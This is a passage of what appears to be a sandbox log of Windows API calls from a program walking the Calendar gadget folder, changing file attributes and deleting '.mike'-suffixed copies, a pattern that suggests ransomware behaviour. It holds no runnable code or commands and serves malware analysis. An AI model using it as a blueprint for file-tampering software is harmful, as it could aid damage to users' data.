hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x842b7a8e, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x842b7a8e, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x284ed995, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x1816, dwReserved0=0x0, dwReserved1=0x0, cFileName="logo.png", cAlternateFileName="")) returned 0 [0102.475] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0102.475] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0102.475] CoTaskMemFree (pv=0x506980) [0102.475] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eaffd21, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x235ff6a0, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eaffd21, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0102.475] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x118ea0e8, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x118ea0e8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x4a9e, dwReserved0=0x0, dwReserved1=0x0, cFileName="calendar.html", cAlternateFileName="")) returned 1 [0102.475] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eaffd21, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x235ff6a0, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eaffd21, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="css", cAlternateFileName="")) returned 1 [0102.476] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x118ea0e8, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x118ea0e8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x3f2, dwReserved0=0x0, dwReserved1=0x0, cFileName="gadget.xml", cAlternateFileName="")) returned 1 [0102.476] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eaffd21, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x235ff6a0, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eaffd21, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="js", cAlternateFileName="")) returned 1 [0102.476] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eaffd21, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x235ff6a0, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eaffd21, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="js", cAlternateFileName="")) returned 0 [0102.478] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0102.484] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\calendar.html", dwFileAttributes=0x80) returned 0 [0102.485] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\calendar.html.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\en-us\\calendar.html.mike")) returned 1 [0102.488] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0102.493] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\gadget.xml", dwFileAttributes=0x80) returned 0 [0102.494] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\gadget.xml.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\en-us\\gadget.xml.mike")) returned 1 [0102.495] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eaffd21, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x66101a0, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x6636300, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0102.495] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x118ea0e8, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x118ea0e8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x4a9e, dwReserved0=0x0, dwReserved1=0x0, cFileName="calendar.html", cAlternateFileName="")) returned 1 [0102.496] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eaffd21, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x235ff6a0, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eaffd21, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="css", cAlternateFileName="")) returned 1 [0102.496] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x118ea0e8, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x118ea0e8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x3f2, dwReserved0=0x0, dwReserved1=0x0, cFileName="gadget.xml", cAlternateFileName="")) returned 1 [0102.496] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eaffd21, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x235ff6a0, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eaffd21, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="js", cAlternateFileName="")) returned 1 [0102.496] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0102.496] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0102.496] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0102.496] CoTaskMemFree (pv=0x506980) [0102.497] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eaffd21, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x235ff6a0, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eaffd21, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0102.497] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x118ea0e8, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x118ea0e8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x12f0, dwReserved0=0x0, dwReserved1=0x0, cFileName="calendar.css", cAlternateFileName="")) returned 1 [0102.497] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0102.497] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eaffd21, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x235ff6a0, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eaffd21, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0102.497] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x118ea0e8, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x118ea0e8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x12f0, dwReserved0=0x0, dwReserved1=0x0, cFileName="calendar.css", cAlternateFileName="")) returned 1 [0102.497] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x118ea0e8, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x118ea0e8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x12f0, dwReserved0=0x0, dwReserved1=0x0, cFileName="calendar.css", cAlternateFileName="")) returned 0 [0102.497] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0102.498] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0102.498] CoTaskMemFree (pv=0x506980) [0102.499] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eaffd21, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x235ff6a0, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eaffd21, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0102.499] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x118ea0e8, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x118ea0e8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xff08, dwReserved0=0x0, dwReserved1=0x0, cFileName="calendar.js", cAlternateFileName="")) returned 1 [0102.499] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0102.499] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eaffd21, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x235ff6a0, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eaffd21, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0102.499] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x118ea0e8, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x118ea0e8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xff08, dwReserved0=0x0, dwReserved1=0x0, cFileName="calendar.js", cAlternateFileName="")) returned 1 [0102.499] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x118ea0e8, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x118ea0e8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xff08, dwReserved0=0x0, dwReserved1=0x0, cFileName="calendar.js", cAlternateFileName="")) returned 0 [0102.500] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0102.500] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0102.500] CoTaskMemFree (pv=0x506980) [0102.501] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x805ee1db, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x805ee1db, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0102.501] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28135767, ftCreationTime.dwHighDateTime=0x1c9ea0e, ftLastAccessTime.dwLowDateTime=0x28135767, ftLastAccessTime.dwHighDateTime=0x1c9ea0e, ftLastWriteTime.dwLowDateTime=0x2815b8c5, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x6a6, dwReserved0=0x0, dwReserved1=0x0, cFileName="bg-desk.png", cAlternateFileName="")) returned 1 [0102.502] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8232d98a, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x8232d98a, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x2815b8c5, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x557, dwReserved0=0x0, dwReserved1=0x0, cFileName="bg-dock.png", cAlternateFileName="")) returned 1 [0102.502] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8232d98a, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x8232d98a, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x2815b8c5, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x496, dwReserved0=0x0, dwReserved1=0x0, cFileName="bg-today.png", cAlternateFileName="")) returned 1 [0102.502] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8245e472, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x8245e472, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28181a23, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xc9, dwReserved0=0x0, dwReserved1=0x0, cFileName="bNext-disable.png", cAlternateFileName="")) returned 1 [0102.502] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82353ae7, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82353ae7, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28181a23, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x19d, dwReserved0=0x0, dwReserved1=0x0, cFileName="bNext-down.png", cAlternateFileName="")) returned 1 [0102.502] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82379c44, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82379c44, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x281a7b81, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x242, dwReserved0=0x0, dwReserved1=0x0, cFileName="bNext-hot.png", cAlternateFileName="")) returned 1 [0102.502] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8239fda1, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x8239fda1, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x281a7b81, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xcb, dwReserved0=0x0, dwReserved1=0x0, cFileName="bNext.png", cAlternateFileName="")) returned 1 [0102.502] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x824845cf, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x824845cf, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28219f9b, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xd9, dwReserved0=0x0, dwReserved1=0x0, cFileName="bPrev-disable.png", cAlternateFileName="")) returned 1 [0102.502] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8239fda1, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x8239fda1, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28219f9b, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x199, dwReserved0=0x0, dwReserved1=0x0, cFileName="bPrev-down.png", cAlternateFileName="")) returned 1 [0102.502] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x823c5efe, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x823c5efe, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28219f9b, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x23e, dwReserved0=0x0, dwReserved1=0x0, cFileName="bPrev-hot.png", cAlternateFileName="")) returned 1 [0102.502] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x823c5efe, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x823c5efe, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x282400f9, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xd8, dwReserved0=0x0, dwReserved1=0x0, cFileName="bPrev.png", cAlternateFileName="")) returned 1 [0102.503] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x824845cf, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x824845cf, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28266257, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x8d6, dwReserved0=0x0, dwReserved1=0x0, cFileName="calendar_double.png", cAlternateFileName="")) returned 1 [0102.503] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x824aa72c, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x824aa72c, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28266257, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xbc1, dwReserved0=0x0, dwReserved1=0x0, cFileName="calendar_double_bkg.png", cAlternateFileName="")) returned 1 [0102.503] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x824d0889, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x824d0889, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28266257, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xdd5, dwReserved0=0x0, dwReserved1=0x0, cFileName="calendar_double_orange.png", cAlternateFileName="")) returned 1 [0102.503] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x824d0889, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x824d0889, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x2828c3b5, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xbd2, dwReserved0=0x0, dwReserved1=0x0, cFileName="calendar_ring_docked.png", cAlternateFileName="")) returned 1 [0102.503] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x824f69e6, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x824f69e6, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28396d47, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x5dc, dwReserved0=0x0, dwReserved1=0x0, cFileName="calendar_single.png", cAlternateFileName="")) returned 1 [0102.503] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8251cb43, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x8251cb43, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28396d47, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xdd8, dwReserved0=0x0, dwReserved1=0x0, cFileName="calendar_single_bkg.png", cAlternateFileName="")) returned 1 [0102.503] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8251cb43, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x8251cb43, ftLastAccessTime.dwHighDateTime=0x1ca0403, 